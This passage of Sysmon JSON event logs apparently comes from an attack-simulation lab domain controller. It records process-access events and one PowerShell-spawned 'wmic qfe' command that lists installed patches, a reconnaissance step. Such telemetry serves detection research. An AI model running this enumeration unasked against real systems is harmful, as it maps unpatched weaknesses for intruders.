07:59:14.158","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-0010544D0800}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5332,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-0010544D0800}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-0010544D0800}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5333,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.176\r\nProcessGuid: {41C8662E-20D2-5F25-0000-0010284E0800}\r\nProcessId: 4232\r\nImage: C:\\Windows\\System32\\wbem\\WMIC.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: wmic  qfe get description,installedOn /format:csv \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E\r\nParentProcessGuid: {41C8662E-20D2-5F25-0000-0010544D0800}\r\nParentProcessId: 5096\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic qfe get description,installedOn /format:csv\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.176","ProcessGuid":"{41C8662E-20D2-5F25-0000-0010284E0800}","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"WMI Commandline Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"wmic.exe","CommandLine":"wmic  qfe get description,installedOn /format:csv ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E","ParentProcessGuid":"{41C8662E-20D2-5F25-0000-0010544D0800}","ParentProcessId":"5096","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic qfe get description,installedOn /format:csv\" ","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5334,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-20D2-5F25-0000-0010544D0800}\r\nSourceProcessId: 5096\r\nSourceThreadId: 4964\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-0010284E0800}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-20D2-5F25-0000-0010544D0800}","SourceProcessId":"5096","SourceThreadId":"4964","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-0010284E0800}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5335,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-0010284E0800}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-0010284E0800}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5336,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5337,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5338,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5339,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5340,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 